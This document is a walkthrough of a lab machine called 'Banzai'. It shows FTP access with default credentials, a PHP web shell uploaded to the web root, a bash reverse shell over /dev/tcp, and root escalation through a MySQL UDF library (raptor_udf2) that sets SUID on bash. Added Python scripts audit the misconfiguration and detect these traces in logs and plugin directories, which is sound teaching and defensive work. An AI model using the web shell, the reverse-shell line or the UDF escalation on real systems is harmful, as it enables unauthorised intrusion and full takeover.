Banzai - OSPG

Summary

We'll obtain initial access by uploading a PHP web shell to the FTP share, which turns out to be the document root of the web application on port 8295, and using it to launch a reverse shell. We then escalate to root by abusing MySQL user-defined functions (UDF) with the root database credentials found in config.php.


Enumeration

Nmap

We'll begin with an nmap scan of all TCP ports.

$ sudo nmap -sV -p- $IP
PORT     STATE SERVICE    REASON         VERSION
21/tcp   open  ftp        syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 
25/tcp   open  smtp       syn-ack ttl 63 Postfix smtpd
5432/tcp open  postgresql syn-ack ttl 63 PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17
8080/tcp open  http       syn-ack ttl 63 Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open  http       syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai

Let's start with the FTP service.

FTP Enumeration

We'll use the ftp command to access the FTP share.

The credentials are: admin:admin.

$ ftp $IP
Connected to 192.168.127.56.
220 (vsFTPd 3.0.3)
Name (192.168.127.56:root): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Listing the directory, we find what looks like the document root of a web site (index.php, css, js, lib), so this FTP share is probably served by one of the web servers.

ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1001     0            4096 Jul 17  2020 .
drwxr-xr-x    7 1001     0            4096 Jul 17  2020 ..
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.

Now, let’s check if we can upload a malicious PHP file onto the service.

From the FTP interactive shell, we run the following command.

ftp> put cmback.php
local: cmback.php remote: cmback.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
31 bytes sent in 0.00 secs (378.4180 kB/s)

The content of cmback.php is:

<?php system($_GET['cmd']); ?>

The output indicates the file was uploaded successfully. We'll now move on to the HTTP service listening on port 8295.

HTTP/8295

Investigating the service, we realize that the files from the FTP share are served here.

To prove the point, we can request the cmback.php file we just uploaded, which can be done with curl.

$ curl -s http://192.168.127.56:8295/cmback.php

An empty response means the file exists and is being executed as PHP (without a cmd parameter there is nothing to print). A missing file would return 404 Not Found instead.
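As an added defensive aside (not part of the original write-up): the root cause of the foothold is a writable FTP share that doubles as an Apache document root with PHP still enabled. The Python script below audits exactly that combination from the two configuration files. The vsftpd.conf and Apache vhost texts are constructed samples, since the box's real configuration is not shown in the write-up, and the check for `php_admin_flag engine Off` assumes mod_php; with PHP-FPM you would look for the PHP handler being removed from the upload directory instead.

```python
"""Audit a writable FTP share that overlaps an Apache document root.

Added example, not from the original write-up. The vsftpd.conf and Apache
vhost texts are constructed samples; the real configuration of the box is
not shown in the write-up.
"""
import re
from pathlib import PurePosixPath

# Constructed vsftpd.conf: local users log in, may write, and are pinned
# to the web content directory (the situation on this box).
VSFTPD_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
local_root=/var/www/html
"""

# Constructed vhost: serves the same directory with PHP enabled.
APACHE_VHOST = """\
<VirtualHost *:8295>
    ServerName banzai
    DocumentRoot /var/www/html
    <Directory /var/www/html>
        Require all granted
    </Directory>
</VirtualHost>
"""

# Constructed hardened vhost: same DocumentRoot, but the mod_php engine
# is switched off for it, so an uploaded .php file is never executed.
APACHE_VHOST_HARDENED = """\
<VirtualHost *:8295>
    DocumentRoot /var/www/html
    <Directory /var/www/html>
        Require all granted
        php_admin_flag engine Off
    </Directory>
</VirtualHost>
"""


def parse_vsftpd(text):
    """Return vsftpd key=value settings as a dict (comments skipped)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def ftp_writable_roots(conf):
    """Directories an FTP client may write to, using vsftpd's defaults
    (write_enable=NO, local_enable=NO, anonymous_enable=YES,
    anon_upload_enable=NO) for anything the file does not set."""
    roots = []
    if conf.get("write_enable", "NO").upper() != "YES":
        return roots
    if conf.get("local_enable", "NO").upper() == "YES":
        roots.append(conf.get("local_root", "<user home>"))
    if (conf.get("anonymous_enable", "YES").upper() == "YES"
            and conf.get("anon_upload_enable", "NO").upper() == "YES"):
        roots.append(conf.get("anon_root", "<ftp user home>"))
    return roots


def apache_php_exposed_roots(text):
    """DocumentRoots whose <Directory> block does not disable mod_php."""
    exposed = []
    for root in re.findall(r'^\s*DocumentRoot\s+"?([^"\s]+)', text, re.M):
        block = re.search(
            r'<Directory\s+"?%s"?\s*>(.*?)</Directory>' % re.escape(root),
            text, re.S | re.I)
        body = block.group(1) if block else ""
        if not re.search(r"php_admin_flag\s+engine\s+off", body, re.I):
            exposed.append(root)
    return exposed


def _within(path, root):
    """True when path is root itself or lies below it."""
    try:
        PurePosixPath(path).relative_to(root)
        return True
    except ValueError:
        return False


def audit(vsftpd_text, apache_text):
    """Return (ftp_root, doc_root) pairs where an FTP upload becomes
    executable PHP on the web server."""
    findings = []
    for ftp_root in ftp_writable_roots(parse_vsftpd(vsftpd_text)):
        for doc_root in apache_php_exposed_roots(apache_text):
            if _within(ftp_root, doc_root) or _within(doc_root, ftp_root):
                findings.append((ftp_root, doc_root))
    return findings


if __name__ == "__main__":
    print("as deployed:", audit(VSFTPD_CONF, APACHE_VHOST))
    print("hardened:   ", audit(VSFTPD_CONF, APACHE_VHOST_HARDENED))
```

Run against the sample configs, the deployed pair reports the overlap at /var/www/html and the hardened vhost reports nothing. Separating the upload directory from the document root (or at least refusing to execute anything under it) is the fix the first finding points at; the FTP credentials being admin:admin is a separate problem the script does not look at.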


Exploitation

Remote Code Execution (RCE)

To confirm the RCE is achievable, we execute:

$ curl -s http://192.168.127.56:8295/cmback.php\?cmd=id    
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The remaining steps are easy since we already have code execution.

Example of a bash reverse shell:

bash -c "bash -i >& /dev/tcp/$ip/$port 0>&1"

The payload should be URL-encoded before it goes into the query string, otherwise characters such as spaces, & and > are interpreted by the shell or the web server rather than passed to the script.

With everything lined up, we request the URL with the encoded payload as the cmd parameter …

$ curl -s http://192.168.127.56:8295/cmback.php\?cmd=<bash_revshell_here>    

and get a call back after a few seconds.

$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.49.127] from (UNKNOWN) [192.168.127.56] 45134
bash: cannot set terminal process group (707): Inappropriate ioctl for device
bash: no job control in this shell
www-data@banzai:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
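As an added detection example, not from the original write-up: every request above leaves a trace in the Apache access log. The script parses a few constructed combined-format log lines modelled on this box's traffic and flags requests to PHP files outside a known manifest, as well as command-style query parameters whose URL-decoded value looks like shell input. The manifest `KNOWN_PHP`, the parameter-name list and the token regex are assumptions chosen for the sample, not Apache's or the project's own.

```python
"""Flag web-shell style requests in Apache access logs.

Added example, not from the original write-up. Sample log lines are
constructed to mirror the traffic in this box (combined log format).
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (combined format).
SAMPLE_LOG = """\
192.168.49.127 - - [17/Jul/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 23364 "-" "Mozilla/5.0"
192.168.49.127 - - [17/Jul/2020:10:00:05 +0000] "GET /cmback.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
192.168.49.127 - - [17/Jul/2020:10:00:09 +0000] "GET /cmback.php?cmd=id HTTP/1.1" 200 53 "-" "curl/7.68.0"
192.168.49.127 - - [17/Jul/2020:10:00:20 +0000] "GET /cmback.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.127%2F8080%200%3E%261%22 HTTP/1.1" 200 0 "-" "curl/7.68.0"
192.168.49.127 - - [17/Jul/2020:10:01:00 +0000] "GET /css/style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: manifest of PHP files that belong to the deployed site.
KNOWN_PHP = {"/index.php"}
# Assumption: parameter names commonly used to pass commands to web shells.
CMD_PARAMS = {"cmd", "exec", "command", "c"}
# Decoded values that look like shell input: redirections, pipes,
# subshells, /dev/tcp, or bare recon commands.
SHELL_TOKENS = re.compile(
    r"(/dev/tcp/|bash -i|nc -e|[;|`]|\$\(|\b(?:id|whoami|uname)\b)"
)


def parse_line(line):
    """Split one combined-format log line into fields, or return None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons a parsed log entry is suspicious."""
    reasons = []
    parts = urlsplit(entry["url"])
    if parts.path.endswith(".php") and parts.path not in KNOWN_PHP:
        reasons.append(f"php file not in manifest: {parts.path}")
    # parse_qsl percent-decodes the values, so the check sees what PHP saw.
    for name, value in parse_qsl(parts.query):
        if name.lower() in CMD_PARAMS and SHELL_TOKENS.search(value):
            reasons.append(f"shell-like value in parameter {name!r}: {value!r}")
    return reasons


def scan(log_text):
    """Return (url, reasons) for every suspicious request in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["url"], reasons))
    return hits


if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_LOG):
        print(url)
        for r in reasons:
            print("   -", r)
```

On the sample log the three cmback.php requests are flagged and the legitimate index.php and CSS requests are not; the reverse-shell request is caught both because the file is unknown and because the decoded value contains /dev/tcp/. The manifest check is the more robust of the two signals, since a web shell can name its parameter anything, which is why the FTP-to-webroot overlap is worth fixing rather than relying on log matching alone.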

Privilege Escalation

MySQL Credentials

Enumerating the file system locally turns up /var/www/config.php, which contains the root credentials of the MySQL service.

www-data@banzai:/var/www$ cat config.php 
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

MySQL UDF

Further enumeration reveals that the MySQL service can be abused through a User-Defined Function (UDF): with root database credentials we can write a shared object into the plugin directory, register it as a function and run commands with the privileges of the mysqld process.

More information on the technique can be found here.

Steps to reproduce the attack:

[1]. Save the raptor_udf2.c exploit and upload it to the /dev/shm directory of the target system.

[2]. Compile raptor_udf2.c.

www-data@banzai:/dev/shm$ gcc -g -c raptor_udf2.c
www-data@banzai:/dev/shm$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

[3]. Now, we can drop into a MySQL interactive shell with the credentials.

www-data@banzai:/dev/shm$ mysql -uroot -pEscalateRaftHubris123

[4]. From the MySQL shell, we run the following …

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('chmod +s /bin/bash');
+---------------------------------+
| do_system('chmod +s /bin/bash') |
+---------------------------------+
|                               0 |
+---------------------------------+
1 row in set (0.00 sec)

The return value 0 shows the command ran; /bin/bash is now SUID root, so we spawn a shell from the MySQL client and run bash with -p to keep the elevated privileges.

mysql> \! sh
$ /bin/bash -p
bash-4.4# whoami
root
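As an added defensive example, not part of the original write-up: the UDF technique leaves artefacts a DBA or incident responder can check for, namely an entry in mysql.func pointing at a library no package installed, a foreign or writable file in the plugin directory, and an unrestricted secure_file_priv (an empty value means LOAD_FILE() and INTO DUMPFILE can touch any path mysqld can). The script below parses the mysql.func table in the same +---+ layout the mysql client prints, a `show variables like 'secure_file_priv'` result, and an `ls -l` of the plugin directory; all three inputs are constructed samples, and `KNOWN_PLUGINS` stands in for a real package manifest.

```python
"""Look for traces of MySQL UDF abuse.

Added example, not from the original write-up. The three inputs are
constructed samples: the mysql.func table and secure_file_priv variable in
the ASCII layout the mysql client prints, and an `ls -l` of the plugin
directory. KNOWN_PLUGINS stands in for a real package manifest.
"""

# Constructed: mysql.func after a foreign UDF was registered.
FUNC_TABLE = """\
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
"""

# Constructed: `show variables like 'secure_file_priv';` with an empty
# value, i.e. LOAD_FILE() / INTO DUMPFILE are not confined to a directory.
VARIABLES_TABLE = """\
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
"""

# Constructed: `ls -l /usr/lib/mysql/plugin` with one packaged plugin and
# one freshly dropped, world-writable shared object.
PLUGIN_LISTING = """\
-rw-r--r-- 1 root  root  45008 Mar  2  2020 auth_socket.so
-rw-rw-rw- 1 mysql mysql 17712 Jul 17 09:41 raptor_udf2.so
"""

# Assumption: libraries the distribution package actually ships.
KNOWN_PLUGINS = {"auth_socket.so"}


def parse_mysql_table(text):
    """Parse the mysql client's +---+ table output into a list of dicts."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # border lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def parse_listing(text):
    """Map file name -> {mode, owner} from `ls -l` style lines."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue
        entries[parts[-1]] = {"mode": parts[0], "owner": parts[2]}
    return entries


def audit(func_text, variables_text, listing_text, known=KNOWN_PLUGINS):
    """Return a list of findings describing UDF-abuse indicators."""
    findings = []
    variables = {r["Variable_name"]: r["Value"]
                 for r in parse_mysql_table(variables_text)}
    if "secure_file_priv" in variables and variables["secure_file_priv"] == "":
        findings.append("secure_file_priv is empty: LOAD_FILE()/INTO DUMPFILE "
                        "can read and write anywhere mysqld can")
    for name, meta in parse_listing(listing_text).items():
        if name not in known:
            findings.append(f"unexpected plugin {name} "
                            f"(owner {meta['owner']}, mode {meta['mode']})")
        if meta["mode"][8] == "w":  # 'other' write bit in rwxrwxrwx
            findings.append(f"plugin {name} is world-writable")
    for row in parse_mysql_table(func_text):
        if row["dl"] not in known:
            findings.append(f"UDF {row['name']} loads non-packaged "
                            f"library {row['dl']}")
    return findings


if __name__ == "__main__":
    for f in audit(FUNC_TABLE, VARIABLES_TABLE, PLUGIN_LISTING):
        print("-", f)
```

On the samples this reports four findings: the empty secure_file_priv, the unknown and world-writable raptor_udf2.so, and the do_system function that loads it. The same findings map directly onto the fixes: run mysqld as an unprivileged user (then do_system runs as that user and cannot set the SUID bit on /bin/bash), keep the plugin directory root-owned and read-only for mysqld, set secure_file_priv to a dedicated directory, and never ship the root database credentials in a web-readable config.php.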